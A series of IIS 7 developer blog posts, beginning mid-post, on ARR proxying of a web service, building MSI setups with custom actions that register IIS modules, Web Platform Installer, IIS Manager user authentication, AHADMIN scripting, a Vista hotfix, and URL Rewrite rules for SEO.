    2. Modify the address="http://www.webservicex.net/stockquote.asmx" to be instead address="http://localhost/stockquote.asmx", it should look like:
    3.     <client>
             
      <endpoint address="http://localhost/stockquote.asmx"
                  binding
      ="basicHttpBinding" bindingConfiguration="StockQuoteSoap"
                  contract
      ="StockQuoteService.StockQuoteSoap" name="StockQuoteSoap" />
          </
      client>
  3. This will cause the client to call the Web Service in the same originating server, now we can configure ARR/URL Rewrite rule to route the Web Service requests to the original end-point
    1. Add a new Web.config to the http://localhost project (Add new item->Web.config)
    2. Add the following content:
    3. <?xml version="1.0" encoding="UTF-8"?>
      <configuration>
         
      <system.webServer>
             
      <rewrite>
                 
      <rules>
                     
      <rule name="Stock Quote Forward" stopProcessing="true">
                         
      <match url="^stockquote.asmx$" />
                          <
      action type="Rewrite" url="http://www.webservicex.net/stockquote.asmx" />
                      </
      rule>
                 
      </rules>
             
      </rewrite>
         
      </system.webServer>
      </configuration>
  4. This rule basically uses regular expression to match the requests for StockQuote.asmx and forwards them to the real Web Service.
  5. Compile everything by running Build->Rebuild Solution
  6. Back in your browser refresh the page to get the new, enter MSFT in the symbol and press Go!
  7. And Voila!!! everything works.

Summary

One of the features offered by ARR is to provide proxy functionality to forward requests to another server. One of the scenarios where this functionality is useful is when using it from clients that cannot make calls directly to the real data, this includes Silverlight, Flash and AJAX applications. As shown in this blog, by just using a few lines of XML configuration you can enable clients to call services in other domains without having to write hundreds of lines of code for each method. It also means that I get the original data and that if the WSDL were to change I do not need to update any wrappers. Additionally if using REST based services you could use local caching in your server relying on Output Cache and increase the performance of your applications significantly (again with no code changes).

Software used

Here is the software I installed to do this sample(amazing that all of it is completely free):

  1. Install Visual Web Developer 2008 Express
  2. Install Silverlight Tools for Visual Studio 2008 SP 1
  3. Install Application Request Routing for IIS 7.
10 Comments
Filed under:

Introduction

IIS 7 provides a rich extensibility model, whether extending the server or the user interface, one critical thing is provide a simple setup application that can install all the required files, add any registration information required, and modify the server settings as required by the extension.
Visual Studio 2008 provides a set of project types called Setup and Deployment projects specifically for this kind of applications. The output generated for these projects is an MSI that can perform several actions for you, including copying files, adding files to the GAC, adding registry keys, and many more.
In this document we will create a setup project to install a hypothetical runtime Server Module that also includes a User Interface extension for IIS Manager.
Our setup will basically perform the following actions:
•    Copy the required files, including three DLL’s and an html page.
•    Add a couple of registry keys.
•    Add the managed assemblies to the GAC
•    Modify applicationHost.config to register a new module
•    Modify administration.config to register a new UI extensibility for InetMgr
•    Create a new sample application that exposes the html pages
•    Finally, we will remove the changes from both configuration files during uninstall

Creating the Setup Project

Start Visual Studio 2008. In the File Menu, select the option New Project.
In the New Project Dialog, expand the Other Project Types option in the Project type tree view.
Select the option Setup and Deployment type and select the option Setup Project. Enter a name for the Project and a location. I will use SampleSetup as the name.

image

Adding Files to the Setup

  • Select the menu View->Editor->File System. This will open the editor where you can add all the files that you need to deploy with your application. In this case I will just add an html file that I have created called readme.htm.
  • To do that, right click the Application Folder directory in the tree view and select the option Add File. Browse to your files and select all the files you want to copy to the setup folder (by default <Program Files>\<Project Name>.

Adding assemblies to the GAC

Adding assemblies to the setup is done in the same File System editor, however it includes a special folder called Global Assembly Cache that represents the GAC in the target system.
In our sample we will add to the GAC the assemblies that have the runtime server module and the user interface modules for IIS Manager. I have created the following set of projects:

  1. SampleModule.dll that includes the runtime module on it.
  2. SampleModuleUI.dll that contains the server-side portion of the IIS Manager extension (ModuleProvider, ModuleService, etc).
  3. SampleModuleUIClient.dll that contains the client side portion of the IIS Manager extension (Module, ModulePage, TaskLists, etc).


Back in Visual Studio,

  • Select the menu option View->Editor->File System
  • Right-click the root node in the Tree view titled File System on Target Machine and select the option Add Special Folder.
    Select the option Global Assembly Cache Folder.
    Right click the newly added GAC folder and choose the option Add File and browse to the DLL and choose OK. Another option is using the Add Assembly and use the "Select Component" dialog to add it.
    Visual Studio will recognize the dependencies that the assembly has, and will try to add them to the project automatically. However, certain assemblies such as Microsoft.Web.Administration, or any other System assemblies should be excluded because they will already be installed in the target machine.
  • To ensure that you don't ship system assemblies, in the Solution Explorer expand the Detected Dependencies folder and right click each of the assemblies that shouldn't be packaged and select the option Exclude. (In our case we will exclude Microsoft.Web.Administration.dll, Microsoft.Web.Management.dll, Microsoft.ManagementConsole.dll and MMCFxCommon.dll)
    After completing this, the project should look as follows:

image

Adding Registry Keys

Visual Studio also includes a Registry editor that helps you adding any registry keys in the target machine. For this sample I will just add a registry key in HKEY_LOCAL_MACHINE\Software\My Company\Message. For that:
Select the menu option View->Editor->Registry.
Expand the HKEY_LOCAL_MACHINE node and drill down to Software\[Manufacturer].
[Manufacturer] is a variable that holds the name of the company, and can be set by selecting the SampleSetup node in Solution Explorer and using the Property Grid to change it. There are several other variables defined such as Author, Description, ProductName, Title and Version that helps whenever dynamic text is required.
Right click [Manufacturer] and select the option new String Value. Enter Message as the name. To set the value you can select the item in the List View and use the Property Grid to set its value.
After completing this, the project should look as follows:

clip_image002

Executing Custom Code

To support any custom code to be executed when running the setup application, Visual Studio (more explicitly MSI) supports the concept of Custom Actions. These Custom Actions include running an application, a script or executing code from a managed assembly.
For our sample, we will create a new project where we will add all the code  to read and change configuration.
Select the option File->Add->New Project.
Select the Class Library template and name it SetupHelper.

image

  • Since we will be creating a custom action, we need to add a reference to System.Configuration.Install to be able to create the custom action. Use the Project->Add Reference. And in the .NET Tab select the System.Configuration.Install and press OK.
  • Since we will also be modifying server configuration (for registering the HTTP Module in ApplicationHost.config and the ModuleProvider in administration.config) using Microsoft.Web.Administration we need to add a reference to it as well. Again use the Project->Add Reference, and browse to <windows>\system32\inetsrv and select Microsoft.Web.Administration.dll
  • Rename the file Class1.cs file to be named SetupAction.cs and make the class name SetupAction. This class needs to inherit from System.Configuration.Install.Installer which is the base class for all custom actions and it has several methods that you can override to add custom logic to the setup process. In this case we will add our code in the Install and the Uninstall method.
using System;
using System.ComponentModel;
using System.Configuration.Install;

namespace SetupHelper {
   
[RunInstaller(true)]
   
public class SetupAction : Installer {
       
public override void Install(System.Collections.IDictionary stateSaver) {
           
base.Install(stateSaver);

           
InstallUtil.AddUIModuleProvider(
                "SampleUIModule"
,
                "SampleUIModule.SampleModuleProvider, SampleUIModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1"
           
);

           
// Add a Server Module to applicationHost.config
            InstallUtil.AddModule(
                "SampleModule"
,
                "SampleModule.SampleModule, SampleModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1"
           
);

           
// Create a web application
            InstallUtil.CreateApplication(
                "Default Web Site"
,
                "/SampleApp"
,
               
Context.Parameters["TargetDir"]
           
);
       
}

       
public override void Uninstall(System.Collections.IDictionary savedState) {
           
base.Uninstall(savedState);

           
InstallUtil.RemoveUIModuleProvider("SampleUIModule");
           
InstallUtil.RemoveModule("SampleModule");
           
InstallUtil.RemoveApplication("Default Web Site", "/SampleApp");
       
}
   
}
}
   

As you can see the code above is actually really simple, it just calls helper methods in a utility class called InstallUtil that is shown at the end of this entry. You will also need to add the InstallUtil class to the project to be able to compile it. The only interesting piece of code above is how we pass the TargetDir from the Setup project to the Custom action through the Parameters property of the InstallContext type.

Configuring the Custom Action

To be able to use our new Custom Action we need to add the SetupHelper output to our setup project, for that:
Select the option View->Editor->File System
Right-click the Application Folder node and select the option Add Project Output... and select the SetupHelper project in the Project drop down.

image

After doing this, the DLL will be included as part of our setup.

Adding the Install Custom Action

Select the option View->Editor->Custom Actions
Right-click the Install node and select the option Add Custom Action… drill down into the Application Folder and select the Primary output from SetupHelper.

image

Click OK and type a name such as InstallModules

Now, since we want to pass the TargetDir variable to be used as the physical path for the web application that we will create within our Installer derived-class, select the custom action and go to the Property Grid. There is a property called CustomActionData. This property is used to pass any data to the installer parameters class, and uses the format “/<name>=<value>”. So for our example we will set it to: /TargetDir="[TARGETDIR]\"

image

Adding the Uninstall Custom Action

In the same editor, right-click the Uninstall node and select the option Add Custom Action…, again drill down into the Application Folder and select the Primary output from SetupHelper.
Press OK and type a name such as UninstallModules.
After doing this the editor should look as follows:

image

Building and Testing the Setup

Finally we can build the solution by using the Build->Rebuild Solution menu option.
This will create a file called SampleSetup.msi, in the folder SampleSetup\SampleSetup\Debug\SampleSetup.msi
You can now run this MSI and it will walk through the process of installing. The user interface that is provided by default can also be configured to add new steps or remove the current steps. You can also provide a Banner logo for the windows and many more options from the View->Editor->User Interface.

clip_image002[4]clip_image002[6]

Visual Studio provides different packaging mechanisms for the setup application. You can change it through the Project Properties dialog where you get the option to use:
1)    As loose uncompressed files. This option packages all the files by just copying them into a file system structure where the files are copied unchanged. This is a good packaging option for CD or DVD based setups
2)    In setup file. This option packages all the files within the MSI file
3)    In cabinet files. This option creates a set of CAB files that can be used in scenarios such as diskette based setup.

You can also customize all the setup properties using the property grid, such as DetectNewerInstalledVersion which will warn users if a newer version is already installed or RemovePreviousVersion that will automatically remove older versions for the user whenever he tries to install a new one.

 

64-bit considerations

Turns out that the managed code custom action will fail under 64-bit platform due to it being executed as a 32-bit custom action the following blog talks about the details and shows how you can fix the issue:

http://blogs.msdn.com/heaths/archive/2006/02/01/64-bit-managed-custom-actions-with-visual-studio.aspx

 

 

Summary

Visual Studio 2008 provides a simple option to easily create Setup applications that can perform custom code through Custom actions. In this document we created a simple custom action to install modules and InetMgr extensions through this support.

For the latest information about IIS 7.0, see the IIS 7 Web site at http://www.iis.net

InstallUtil

This is the class that is used from the SetupHelper class we created to do the actual changes in configuration. As you can see it only has six public methods, AddModule, AddUIModuleProvider, CreateApplication, RemoveApplication, RemoveModule, and RemoveUIModule. The other methods are just helper methods to facilitate reading configuration.

using System;
using Microsoft.Web.Administration;

namespace SetupHelper {

   
public static class InstallUtil {

       
/// <summary>
        /// Registers a new Module in the Modules section inside ApplicationHost.config
        /// </summary>
        public static void AddModule(string name, string type) {
           
using (ServerManager mgr = new ServerManager()) {
               
Configuration appHostConfig = mgr.GetApplicationHostConfiguration();
               
ConfigurationSection modulesSection = appHostConfig.GetSection("system.webServer/modules");
               
ConfigurationElementCollection modules = modulesSection.GetCollection();

               
if (FindByAttribute(modules, "name", name) == null) {
                   
ConfigurationElement module = modules.CreateElement();
                   
module.SetAttributeValue("name", name);
                   
if (!String.IsNullOrEmpty(type)) {
                       
module.SetAttributeValue("type", type);
                   
}

                   
modules.Add(module);
               
}

               
mgr.CommitChanges();
           
}
       
}

       
public static void AddUIModuleProvider(string name, string type) {
           
using (ServerManager mgr = new ServerManager()) {

               
// First register the Module Provider 
                Configuration adminConfig = mgr.GetAdministrationConfiguration();

               
ConfigurationSection moduleProvidersSection = adminConfig.GetSection("moduleProviders");
               
ConfigurationElementCollection moduleProviders = moduleProvidersSection.GetCollection();
               
if (FindByAttribute(moduleProviders, "name", name) == null) {
                   
ConfigurationElement moduleProvider = moduleProviders.CreateElement();
                   
moduleProvider.SetAttributeValue("name", name);
                   
moduleProvider.SetAttributeValue("type", type);
                   
moduleProviders.Add(moduleProvider);
               
}

               
// Now register it so that all Sites have access to this module
                ConfigurationSection modulesSection = adminConfig.GetSection("modules");
               
ConfigurationElementCollection modules = modulesSection.GetCollection();
               
if (FindByAttribute(modules, "name", name) == null) {
                   
ConfigurationElement module = modules.CreateElement();
                   
module.SetAttributeValue("name", name);
                   
modules.Add(module);
               
}

               
mgr.CommitChanges();
           
}
       
}

       
/// <summary>
        /// Create a new Web Application
        /// </summary>
        public static void CreateApplication(string siteName, string virtualPath, string physicalPath) {
           
using (ServerManager mgr = new ServerManager()) {
               
Site site = mgr.Sites[siteName];
               
if (site != null) {
                   
site.Applications.Add(virtualPath, physicalPath);
               
}
               
mgr.CommitChanges();
           
}
       
}

       
/// <summary>
        /// Helper method to find an element based on an attribute
        /// </summary>
        private static ConfigurationElement FindByAttribute(ConfigurationElementCollection collection, string attributeName, string value) {
           
foreach (ConfigurationElement element in collection) {
               
if (String.Equals((string)element.GetAttribute(attributeName).Value, value, StringComparison.OrdinalIgnoreCase)) {
                   
return element;
               
}
           
}

           
return null;
       
}

       
public static void RemoveApplication(string siteName, string virtualPath) {
           
using (ServerManager mgr = new ServerManager()) {
               
Site site = mgr.Sites[siteName];
               
if (site != null) {
                   
Application app = site.Applications[virtualPath];
                   
if (app != null) {
                       
site.Applications.Remove(app);
                       
mgr.CommitChanges();
                   
}
               
}
           
}
       
}

       
/// <summary>
        /// Removes the specified module from the Modules section by name
        /// </summary>
        public static void RemoveModule(string name) {
           
using (ServerManager mgr = new ServerManager()) {
               
Configuration appHostConfig = mgr.GetApplicationHostConfiguration();
               
ConfigurationSection modulesSection = appHostConfig.GetSection("system.webServer/modules");
               
ConfigurationElementCollection modules = modulesSection.GetCollection();
               
ConfigurationElement module = FindByAttribute(modules, "name", name);
               
if (module != null) {
                   
modules.Remove(module);
               
}

               
mgr.CommitChanges();
           
}
       
}


       
/// <summary>
        /// Removes the specified UI Module by name
        /// </summary>
        public static void RemoveUIModuleProvider(string name) {
           
using (ServerManager mgr = new ServerManager()) {
               
// First remove it from the sites
                Configuration adminConfig = mgr.GetAdministrationConfiguration();
               
ConfigurationSection modulesSection = adminConfig.GetSection("modules");
               
ConfigurationElementCollection modules = modulesSection.GetCollection();
               
ConfigurationElement module = FindByAttribute(modules, "name", name);
               
if (module != null) {
                   
modules.Remove(module);
               
}

               
// now remove the ModuleProvider
                ConfigurationSection moduleProvidersSection = adminConfig.GetSection("moduleProviders");
               
ConfigurationElementCollection moduleProviders = moduleProvidersSection.GetCollection();
               
ConfigurationElement moduleProvider = FindByAttribute(moduleProviders, "name", name);
               
if (moduleProvider != null) {
                   
moduleProviders.Remove(moduleProvider);
               
}

               
mgr.CommitChanges();
           
}
       
}
   
}
}

Today we are releasing a new Web Site at http://www.microsoft.com/web/ where users can get a one stop shop for learning about the Microsoft Web Platform. This is part of a bigger effort to make it easier to get started with building and running Web Applications on Windows and IIS.

As part of this a new tool called the Web Platform Installer Beta is also being released to help you getting started installing and getting all the software that you need from a single place without having to hunt around for installers, links or anything else. Just launch the tool, choose the software and configuration you are interested and it takes care of validating and installing pre-requisites.

This tool will let you easily setup your development machines for building Web Applications quite nicely, it will also help you discover new tools, applications, features and beta's as they are getting released from several sources including IIS, ASP.NET and Visual Web Developer and more as we continually make new software available through updates to the feed that the tool consumes.

Download page: http://www.microsoft.com/web/channel/products/WebPlatformInstaller.aspx

Link to Run it: http://go.microsoft.com/?linkid=9588072 

Here are a few snapshots of the tool:

This is the start page where you can choose to install everything available or customize the installation (Your Choice).

WebPI Start Page

In this page you can customize the selection and browse around all the current list of products and check and uncheck any product you want to install.

image

There are a couple of more pages, and finally the progress where the tool downloads any files required and install them, so that you can at once get the whole Web Platform installed easily.

image

Some of the products and features that the Beta supports installing and configuring include:

  1. IIS (Ability to granularly configure each of the features of IIS)
  2. IIS Extensions (such as the Out-of-band releases that we have made available in http://www.iis.net including Bit Rate Throttling, Web Playlist, Microsoft Web Deployment, FTP 7.0 Server, URL Rewrite, and more)
  3. .NET Framework 3.5
  4. SQL Express 2008
  5. SQL Server Driver for PHP
  6. Visual Web Developer 2008 Express
  7. Windows Installer 4.5
  8. more

So as you can see everything you need to build Web Applications, from a Web Server (IIS), to a Development tool (Visual Web Developer) to a Database (SQL Server Express) and many more all for free.

So go ahead and try the tool, give us feedback (remember this is a Beta) so it can only get better :)

0 Comments
Filed under: ,

Today in the IIS.NET Forums a question was asked if it was possible to use the same IIS Manager Users authentication in the context of a Web Application so that you could have say something like WebDAV using the same credentials as you use when using IIS Manager Remote Administration.

The IIS Manager Remote Administration allows you to connect to manage your Web Site using credentials that are not Windows Users, but instead just a combination of User and Password. This is implemented following a Provider model where the default implementation we ship uses our Administration.config file (%windir%\system32\inetsrv\config\administration.config) as the storage for this users. However, you can easily implement a base class to authentication against a database or any other users store if needed. This means you can build your own application and call our API's (ManagementAuthentication).

Even better in the context of a Web Site running in IIS 7.0 you can actually implement this without having to write a single line of code.

Disclaimer: Administration.config out-of-the box only has permissions for administrators to be able to read the file. This means that a Web Application will not be able to access the file, so you need to change the ACL's in the file to provide read permissions for your Application, but you should make sure that you limit the read access to the minimum required such as below.

Here is how you do it:

  1. First make sure that your Web Site is using SSL to use this. (Use IIS Manager and right click your Web Site and Edit Bindings and add an SSL binding).
  2. So that we can restrict permissions further, make your application run in its own Application Pool, this way we can change the ACL's required to only affect your application pool and nothing else. So using IIS Manager go to Application Pools and add a new Application running in Integrated Mode, and give it a name you can easily remember, say WebMgmtAppPool (we will use this in the permissions below).
  3. Disable Anonymous Authentication in your application. (Use IIS Manager, drill-down to your application, double click the Authentication feature and disable Anonymous Authentication and any other authentication module enabled).
  4. Enable the Web Management Authentication Module in your application, you can add a Web.config file with the following contents on it:
    <configuration>
     
    <system.webServer>
       
    <modules>
         
    <add name='WebManagementBasicAuthentication' 
               type
    ='Microsoft.Web.Management.Server.WebManagementBasicAuthenticationModule, Microsoft.Web.Management, Version=7.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' />
        </
    modules>
     
    </system.webServer> 
    </configuration> 
  5. Modify the ACL's in the required configuration files:
    1. Give read access to the config directory so we can access the files using the following command line (note that we are only giving permissions to the Application Pool)
      icacls %windir%\system32\inetsrv\config /grant "IIS AppPool\WebMgmtAppPool":(R)
    2. Give read access to the redirection.config:
      icacls %windir%\system32\inetsrv\config\redirection.config /grant "IIS AppPool\WebMgmtAppPool":(R)
    3. Finally give read access to administration.config:
      icacls %windir%\system32\inetsrv\config\administration.config /grant "IIS AppPool\WebMgmtAppPool":(R)
  6. At this point you should be able to navigate to your application using any browser and you should get a prompt for credentials that will be authenticated against the IIS Manager Users.

What is also nice is that you can use URL Authorization to further restrict permissions in your pages for this users, for example, if I didn't want a particular IIS Manager User (say MyIisManagerUser) to access the Web Site I can just configure this in the same web.config:

<configuration>
 
<system.webServer>
       
<security>
           
<authorization>
               
<add accessType="Deny" users="MyIisManagerUser" />
            </
authorization>
       
</security>
 
</system.webServer>
</configuration>

If you want to learn more about remote administration and how to configure it you can read: http://learn.iis.net/page.aspx/159/configuring-remote-administration-and-feature-delegation-in-iis-7/

1 Comments
Filed under: ,

AHADMIN is the COM API that IIS 7.0 uses for reading and writing its configuration system. One of the not so well known features is that you can also use the same API to manage Administration.config by calling the SetMetadata method and specifying that you will be targeting Administration.config. What this ends up doing is using an IAppHostPathMapper built-in mapper that will re-map the files so that you can manage Administration.config easily.

Here is an example of a common operation that adds a ModuleProvider (UI Extensibility Module) and its corresponding Module.


// Create a Configuration System for modifying Administration.config
var adminManager = new ActiveXObject("Microsoft.ApplicationHost.WritableAdminManager");
adminManager.CommitPath = "MACHINE/WEBROOT";
adminManager.SetMetadata("pathMapper", "AdministrationConfig");

// add the module in the moduleProviders section
AddModuleProvider(adminManager, "myIISModule", "myIISModuleUI, Version=1.0.0.0, Culture=neutral, PublicKeyToken=YourPublicKey");

// add the module in the modules section
AddModule(adminManager, "myIISModule");

// commit changes
adminManager.CommitChanges();


function AddModuleProvider(adminManager, name, type) {
   
var moduleProvidersSection = adminManager.GetAdminSection("moduleProviders", "MACHINE/WEBROOT");

   
var moduleProviders = moduleProvidersSection.Collection;

   
// if already exists, do nothing
    var addElementPos = FindElement(moduleProviders, "add", ["name", name]);
   
if (addElementPos != -1) return;

   
var moduleProvider = moduleProviders.CreateNewElement("add");
   
moduleProvider.Properties.Item("name").Value = name;
   
moduleProvider.Properties.Item("type").Value = type;

   
moduleProviders.AddElement(moduleProvider);
}

// if already exists, do nothing
function AddModule(adminManager, name) {
   
var modulesSection = adminManager.GetAdminSection("modules", "MACHINE/WEBROOT");

   
var modules = modulesSection.Collection;

   
// See if already exists
    var addElementPos = FindElement(modules, "add", ["name", name]);
   
if (addElementPos != -1) return;

   
var module = modules.CreateNewElement("add");
   
module.Properties.Item("name").Value = name;

   
modules.AddElement(module);
}

// Helper function to find an element in a collection based on the specified attributes
function FindElement(collection, elementTagName, valuesToMatch) {
   
for (var i = 0; i < collection.Count; i++) {
       
var element = collection.Item(i);

       
if (element.Name == elementTagName) {
           
var matches = true;
           
for (var iVal = 0; iVal < valuesToMatch.length; iVal += 2) {
               
var property = element.GetPropertyByName(valuesToMatch[iVal]);
               
var value = property.Value;
               
if (value != null) {
                   
value = value.toString();
               
}
               
if (value != valuesToMatch[iVal + 1]) {
                   
matches = false;
                   
break;
               
}
           
}
           
if (matches) {
               
return i;
           
}
       
}
   
}

   
return -1;
}

I'll use this time to also mention that it is very important to add it to the Modules section in case you want your module to be used from Site and Application delegated connections, otherwise only Server connections will get them.

0 Comments
Filed under:

Every now and then after leaving my computer running for several weeks I would get a weird error message when trying to launch Excel saying something like:

C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE is not a valid Win32 application.

or

This file does not have a program associated with it for performing this action. Create an association in the Set Associations control panel.

I tried several things to make it run again, but only a restarting would solve the problem. Finally, I decided to investigate a bit more and turns out there is a fix that solves the problem that you can download from Microsoft support:

http://support.microsoft.com/kb/952709

This update improves the reliability of Windows Vista SP1-based computers that experience issues in which large applications cannot run after the computer is turned on for extended periods of time. For example, when you try to start Excel 2007 after the computer is turned on for extended periods of time, a user may receive an error message that resembles the following:

EXCEL.EXE is not a valid Win32 application

I just installed it and so far so good, no more weird errors but I guess I need to wait a few weeks before I can testify it works. Either way I though this could be helpful for others.

Direct links for the fix download are:

Windows Vista, 32-bit versions
Download the Update for Windows Vista (KB952709) package now. (http://www.microsoft.com/downloads/details.aspx?FamilyId=DF72A9B0-564E-4326-894E-05CBA709CB39)
Windows Vista, 64-bit versions
Download the Update for Windows Vista for x64-based Systems (KB952709) package now. (http://www.microsoft.com/downloads/details.aspx?FamilyId=C3536CAA-7B71-4525-9D23-21A5B3D4507F)

In the past few days I've been reading a bit about SEO and trying to understand more about what makes a Web Site be SEO (Search-Engine-Optimized) and what are some of the typical headaches when trying to achieve that as well as how we can implement them in IIS.

Today I decided to post how you can make your Web Site running IIS 7.0 a bit "friendlier" to Search Engines without having to modify any code in your application. Being SEO is a big statement since it can include several things, so for now I will scope the discussion to 3 things that can be easily addressed using the IIS URL Rewrite Module:

  1. Canonicalization
  2. Friendly URL's
  3. Site Reorganization

1) Canonicalization

Basically the goal of canonicalization is to ensure that the content of a page is only exposed as a unique URI. The reason this is important is because even though for humans it's easy to tell that http://www.carlosag.net is the same as http://carlosag.net, many search engines will not make any assumptions and keep them as two separate entries, potentially splitting the rankings of them lowering their relevance. Another example of this is http://www.carlosag.net/default.aspx and http://www.carlosag.net/. You can certainly minimize the impact of this by writing your application using the canonical forms of your links, for example in your links you can always link to the right content for example: http://www.carlosag.net/tools/webchart/ and remove the default.aspx, however that only accounts for part of the equation since you cannot assume everyone referencing your Web Site will follow this carefully, you cannot control their links.

This is when URL Rewrite comes into play and truly solves this problem.

Host name.

URL Rewrite can help you redirect when the users type your URL in a way you don't unnecessarily want them to, for example just carlosag.net. Choosing between using WWW or not is a matter of taste but once you choose one you should ensure that you guide everyone to the right one. The following rule will automatically redirect everyone using just carlosag.net to www.carlosag.net. This configuration can be saved in the Web.config file in the root of your Web Site.Note that I'm only including the XML in this blog, however I used IIS Manager to generate all of these settings so you don't need to memorize the XML schema since the UI includes several friendly capabilities to generate all of these..

<configuration>
 
<system.webServer>
   
<rewrite>
     
<rules>
       
<rule name="Redirect to WWW" stopProcessing="true">
         
<match url=".*" />
          <
conditions>
           
<add input="{HTTP_HOST}" pattern="^carlosag.net$" />
          </
conditions>
         
<action type="Redirect" url="http://www.carlosag.net/{R:0}" redirectType="Permanent" />
        </
rule>
     
</rules>
   
</rewrite>
 
</system.webServer>
</configuration>

Note that one important thing is to use Permanent redirects (301) , this will ensure that if anybody links your page using a non-WWW link when the search engine bot crawls their Web Site it will identify the link as permanently moved and it will treat the new URL as the correct address and it will not index the old URL, which is the case when using Temporary (302) redirects. The following shows how the response of the server looks like:

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://www.carlosag.net/tools/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 01 Sep 2008 22:45:49 GMT
Content-Length: 155

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF=http://www.carlosag.net/tools/>here</a></body>

Default Documents

IIS has a feature called Default Document that allows you to specify the content that should be processed when a user enters a URL that is mapped to a directory and not an actual file. In other words, if the user enters http://www.carlosag.net/tools/ then they will actually get the content as if they entered http://www.carlosag.net/tools/default.aspx. That is all great, the problem is that this feature only works one way by mapping a Directory to a File, however it does not map the File to the Document, this means that if some of your links or other users enter the full URL, then search engines will see two different URL's. To solve that problem we can use a configuration very similar to the rule above, following is a rule that will redirect the default.aspx to the canonical URL (the folder).

        <rule name="Default Document" stopProcessing="true">
         
<match url="(.*)default.aspx" />
          <
action type="Redirect" url="{R:1}" redirectType="Permanent" />
        </
rule>

This again, uses a Permanent redirect to extract everything before Default.aspx and redirect it to the "parent" URL path, so for example, if the user enters http://www.carlosag.net/Tools/WindowsLiveWriter/default.aspx it will be redirected to http://www.carlosag.net/Tools/WindowsLiveWriter/ as well as http://www.carlosag.net/Tools/default.aspx to http://www.carlosag.net/Tools/. You can place this rule at the root of your site and it will take care of all the default documents (if you have a default.aspx in every folder)

2) Friendly URL's

Asking your user to remember that www.contoso.com/books.aspx?isbn=0735624410 is the URL for the IIS Resource Kit is not the nicest thing to do, first of all why do they care about this being an ASPX and the fact that it takes arguments and what not. It seems that providing them with a URL like www.contoso.com/books/IISResourceKit will truly resonate with them and be easier for them to remember and pass along. Most importantly it really doesn't tie you to any Web technology.

With URL Rewrite you can easily build this kind of logic automatically without having to modify your code using Rewrite Maps:

<configuration>
 
<system.webServer>
   
<rewrite>
     
<rules>
       
<rule name="Rewrite for Books" stopProcessing="true">
         
<match url="Books/(.+)" />
          <
action type="Rewrite" url="books.aspx?isbn={Books:{R:1}}" />
        </
rule>
     
</rules>
     
<rewriteMaps>
       
<rewriteMap name="Books">
         
<add key="IISResourceKit" value="0735624410" />
          <
add key="ProfessionalIIS7" value="0470097825" />
          <
add key="IIS7AdministratorsPocketConsultant" value="0735623643" />
          <
add key="IIS7ImplementationandAdministration" value="0470178930" />
        </
rewriteMap>
     
</rewriteMaps>
   
</rewrite>
 
</system.webServer>
</configuration>

The configuration above includes a rule that uses a Rewrite Map to translate a URL like: http://www.contoso.com/books/IISResourceKit into http://www.contoso.com/books.aspx?isbn=0735624410 automatically. Using maps is a very convenient way to have a "table" of values that can be transformed into any other value to be used in the result URL. Of course there are better ways of doing this when using large catalogs or values that change frequently but is extremely useful when you have a consistent set of values or when you can't make changes to an existing application. Note that since we use Rewrite the end users never see the "ugly-URL" unless they knew it already and typed it, and of course this means you can use the inverse approach to ensure the canonicalization is preserved:

    <rewrite>
     
<rules>
       
<rule name="Redirect Books to Canonical URL" stopProcessing="true">
         
<match url="books\.aspx" />
          <
action type="Redirect" url="Books/{ISBN:{C:1}}" appendQueryString="false" />
          <
conditions>
           
<add input="{QUERY_STRING}" pattern="isbn=(.+)" />
          </
conditions>
       
</rule>
     
</rules>
     
<rewriteMaps>
       
<rewriteMap name="ISBN">
         
<add key="0735624410" value="IISResourceKit" />
          <
add key="0470097825" value="ProfessionalIIS7" />
          <
add key="0735623643" value="IIS7AdministratorsPocketConsultant" />
          <
add key="0470178930" value="IIS7ImplementationandAdministration" />
        </
rewriteMap>
     
</rewriteMaps>
   
</rewrite>

The rule above does the "inverse" by matching the URL books.aspx, extracting the ISBN query string value and doing a lookup in the ISBN table and redirecting the client to the canonical URL, so again if user enters http://www.contoso.com/books.aspx?isbn=0735624410 they will be redirected to http://www.contoso.com/books/IISResourceKit.

This Friendly URL to me is more of a user feature than a SEO feature, however I've read in every SEO guide to reduce the number of parameters in your Query String, however, I have not find yet any document that clearly states if there is truly a limit in the search engine bot's that would truly impact the search relevance. I guess it makes sense that they wouldn't keep track of thousands of links to a catalog.aspx that has zillions of permutations based on hundreds of values in the query string (category, department, price range, etc) even if all of them were linked, but again I don't have any prove.

3) Site Reorganization

One complex tasks that Web Developers face sometimes is trying to reorganize their current Web Site structure, whether its moving a section to a different path, or something as simple as renaming a single file, you need to take into consideration things like, Is this move a temporary thing?, How do I ensure old clients get the new URL?, How do I prevent losing the search engine relevance?. URL Rewrite will help you perform these tasks.

Rename a file

If you rename a file you can very easily just write a Rewrite or Redirect Rule that ensures that your users continue getting the content. If your intent is to never go back to the old name you should use a Redirect Permanent so everyone starts getting the new content with its new "Canonical URL", however, if this could be a temporary thing you should use a Redirect Temporary. Finally a Rewrite is useful if you still want both URL's to continue to be valid (though this breaks the canonicality).

      <rule name="Rename File.php to MyFile.aspx" stopProcessing="true">
         
<match url="File\.php" />
          <
action type="Redirect" url="MyFile.aspx" redirectType="Permanent" />
      </
rule>

Moving directories

Another common scenario is when you need to move an entire directory to another place of the Web Site. It could also be that based on some criteria (say Mobile browsers or other User Agent) get a different set of pages/images. Either way, URL rewrite helps with this. The following configuration will redirect every call to the /Images directory to the /NewImages directory.

      <rule name="Move Images to NewImages" stopProcessing="true">
         
<match url="^images/(.*)" />
          <
action type="Redirect" url="NewImages/{R:1}" redirectType="Permanent" />
      </
rule>

A related scenario is if you wanted to show different smaller images whenever a user of Windows CE was accessing your site, you could have a "img" directory where all the small images are stored and use a rule like the following:

        <rule name="Use Small Images for Windows CE" stopProcessing="true">
         
<match url="^images/(.*)" />
          <
action type="Rewrite" url="/img/{R:1}" />
          <
conditions>
           
<add input="{HTTP_USER_AGENT}" pattern="Windows CE" ignoreCase="false" />
          </
conditions>
       
</rule>

Note, that in this case the use of Rewrite makes sense since we want the small images to look as the original images to the browser and it will save a "round-trip" to it.

Moving multiple files

